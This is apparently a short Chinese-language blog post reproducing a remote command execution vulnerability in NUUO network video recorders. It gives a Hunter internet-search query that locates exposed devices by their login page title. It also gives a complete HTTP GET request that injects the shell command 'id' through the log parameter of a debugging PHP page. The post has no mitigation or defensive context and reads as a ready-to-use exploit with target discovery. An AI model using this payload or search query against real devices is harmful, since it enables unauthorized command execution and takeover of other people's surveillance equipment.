Babing
Published on 2024-08-30 / 3 Visits
0
0

N2-1Nuuo-摄像头-RCE

N2-1Nuuo-摄像头-RCE

漏洞描述:

NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。

影响版本:

  • Nuuo-摄像头

网站图片:

image-1.webp

网络测绘:

Hunter 语法:

  • hunterweb.title=“Network Video Recorder Login”

漏洞复现:

payload:

GET /__debugging_center_utils___.php?log=;id HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

效果图:
image-1.webp


Comment